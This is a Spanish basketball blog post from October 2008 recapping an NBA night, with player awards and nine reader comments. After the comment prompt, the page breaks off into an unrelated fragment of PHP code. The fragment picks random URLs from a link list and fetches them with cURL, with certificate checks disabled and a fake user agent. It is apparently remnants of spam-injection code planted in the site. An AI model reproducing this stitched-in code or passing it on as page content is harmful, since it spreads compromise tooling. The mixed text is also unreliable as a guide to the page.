La crónica (30/10/08)

31 de October de 2008 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32nashcp

La víspera de Hallowen nos dejó tres importantes duelos y algunas actuaciones inmensas. Apenas hemos empezado y algunos ya se muestran en plena forma. De aperitivo, LeBron James rozó el triple doble en un partido fácil contra los Bobcats. El juego interior que les tiene que sostener para llegar a Playoffs se mostró inoperante y el sistema defensivo de Larry Brown, nulo. Tienen mucho trabajo por delante.

Por Cleveland Daniel Gibson se salió, recordando al rookie que ayudó a LeBron a llegar a la final hace dos años. A El Elegido parece bastarle con que le ayude un único compañero para ganar partidos, al menos por ahora.

Los Suns, tras vencer a los Spurs, dieron argumentos a los que los excluyen del grupo de favoritos al perder en su casa contra unos Hornets que, sin Chandler, se mostraron en todo momento superiores. Su victoria quedó empañada por la lesión de Stojakovic en el último cuarto, cuando venía haciendo un excelente partido. No se conoce todavía el alcance de la misma.

Como colofón, los Rockets realizaron toda una declaración de intenciones para este año ante los nuevos Mavericks de Carlisle. El gran Yao sencillamente abusó del juego interior de Dallas, y Artest reivindicó su implicación y su condición de estrella junto a un McGrady a medio gas en un extraordinario comienzo de temporada de los Rockets.

lebronbenUnas pequeñas conclusiones que extraemos de la jornada:

– El primer ataque de los Mavericks bajo la dirección de Carlisle acabó en pérdida de balón tras agotar los 24 segundos de posesión. ¿Presagio?

– Yao, 30 puntos; Artest, 29 puntos; McGrady, 16. ¿Habrá pasado T-Mac de jugador franquicia a tercera opción? No lo sabremos hasta que no se recupere de los problemas físicos que arrastra, si es que eso ocurre algún día.

– Dijo Larry Brown hace unas semanas que Sean May había llegado al training camp en muy baja forma. En su primer partido, May falló sus 6 tiros a canasta, se llevó tres tapones y sus números fueron 2 puntos y 3 rebotes.  Dos preguntas: 1- Si Brown sabe que May está mal ¿por qué lo pone como titular? Y 2- ¿Sabemos si Brown dijo algo sobre el estado de forma de Felton?

– Hornets 108 – Suns 95. Moraleja: Si dejas que Morris Peterson te meta 21 puntos, perderás.

– ¿En qué se parecen LeBron James y Dwight Howard? En el porcentaje de acierto en tiros libres, además de en unas estadísticas estratosféricas.

Veamos el resumen de los partidos antes de los Premios TJ:

Premios TJ

MVP: Yao. 30 puntos, con porcentajes impresionantes en tiros de campo y tiros libres, 13 rebotes, 3 asistencias y 3 tapones para 41 de eficiencia logró el pívot chino. Demoledor.yao

El rookie: Muy poco protagonismo acapararon los debutantes anoche. El único que tuvo minutos fue DJ Augustin, que sin brillar en exceso, sí mejoró las prestaciones de Felton con 12 puntos en 25 minutos.

La sorpresa: Lo más sorprendente de la noche serían los 25 puntos de Gibson (quien curiosamente hizo 4 de 6 en triples y 1 de 5 en tiros libres) si no fuese porque Aaron Brooks, teóricamente lesionado las próximas dos semanas, no sólo jugó sino que además logró 14 puntos, 5 asistencias y 3 rebotes en 19 minutos.

La decepción: Felton & May. Los dos primeras rondas del año 2005 de los Bobcats naufragaron ante los Cavs. Entre ambos firmaron un aberrante 1 de 16 en tiros de campo.

El mayor esfuerzo en vano: Los 36 puntos y 7 rebotes de Nowitzki y los 28 puntos, 11 rebotes y 4 asistencias de Howard no fueron suficiente para dar a Carlisle una victoria en su estreno.

Y las 10 mejores jugadas de la noche son éstas:

Comenta

9 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Lo has clavado.

    Me llaman la atención dos cosas:
    -La pasmosa facilidad con que los Hornets han ganado a Phoenix en su casa (cuidadito con ellos)
    -El nivel de rockets.
    El problema de estos es que, por muy bien que estén, sus debilidades están latentes… hasta el último partido de la temporada esperaremos lesiones y hasta el último momento de la temporada esperaremos líos con Artest involucrado. No obstante todo, nivel a priori de posibles campeones da la sensación de que lo tienen.

      Citar

  2. telekoman dice:
    #2

    Hombre, 17 puntos y 7 asistencias de Mo Williams tampoco está mal. Y los 10 puntos y 5 tapones de Wallace tampoco. Vamos que el amigo Lebron no está sólo del todo.

      Citar

  3. MagicJohnson32 dice:
    #3

    Sí, creo que los Cavs firman ya mismo que Wallace promedie 10 rebotes y 5 tapones, aunque no meta más que dos puntos. De todos modos, en Cleveland será difícil que cualquier que no sea LeBron haga buenos números.

      Citar

  4. llukas70 dice:
    #4

    Es verdad que los 30 puntos de Yao y los 29 de Artest no se pueden comparar con los 16 de McGrady.
    Y tambien es verdad que Tracy jugo a medio gas, pero dio 7 asistencias (algo a lo que nos tiene acostumbrados) y cogio 5 rebotes, junto con los 16 puntos. Con esto quiero decir que McGrady continua siendo de los mejores ( a cualquier jugador ya le gustaria tener estos numeros). Desde 2004 cuando se fue a los Rockets el escolta a quedado en un segundo plano, quedando relegado por Yao Ming, y ahora con la llegada de Artest podria quedar a un tercer plano. Desde aquel momento los numeros de McGrady han ido bajando año por año, T-Mac ya no es aquel jugador de Orlando que fue dos veces maximo anotador de la NBA, promediando mas de 30 puntos por partido, y que era el escolta a ocupar el hueco que Michael Jordan habia dejado. Por eso yo creo que T-Mac continua siendo de los mejores y se merece estar en un equipo en el que pueda volver a ser el de antes.

      Citar

  5. Jabho dice:
    #5

    Los Rockets tienen un equipazo. Si duran sanos….

      Citar

  6. Viva_Dirk dice:
    #6

    Me suena de algo eso de los Rockets, quiza me lleve sonando desde que llegó McGrady, jeje.

    Con respecto a lo que dice Lucas, McGrady nunca fue el escolta llamado a ocupar ningun hueco, menos aun el de Michael Jordan; en primer lugar porque casi nunca ha jugado de escolta, normalmente lo ha hecho de alero, y 2º porque para eso hay que triunfar mínimamente en play-offs. Aun así estoy deacuerdo en que sigue siendo un gran jugador, ahora de un modo distinto al de antes pero muy bueno de todos modos.

    Para acabar a lo de que es dificil que nadie haga buenos números con Lebron, no lo veo así, Ilgauskas no ha hecho malos números y creo que Mo Williams los hará muy buenos.

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    Con respecto a los Rockets,,debemos partir del hecho que Yao se va a lesionar??

      Citar

  8. Jabho dice:
    #8

    Empezó bien con 3 temporadas de +80 partidos. Pero las tres ultimas de 57, 48 y 55. Diría que las dudas son justificadas ¿no?

      Citar

  9. llukas70 dice:
    #9

    Respecto a lo que ha dicho VIVA-DIRK sobre mi comentario, estoy deacuerdo con lo que ha dicho sobre los Cleveland en que no solo Lebron James puede hacer buenos numeros por que Ilgauskas es un jugador de 14 puntos por partido y 9 rebotes que creo que no estan nada mal por la edad que tiene y por el numero de minutos que juega. Despues tambien creo que si Ben Wallace recuperara su mejor version podria realizar unos grandes numeros, y podria jugar de ala-pivot junto con Ilgauskas de pivot (para mi seria una gran pareja). Y para acabar Maurice Williams que tambien creo que en el futuro podria realizar unos buenos numeros junto con Daniel Gibson.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>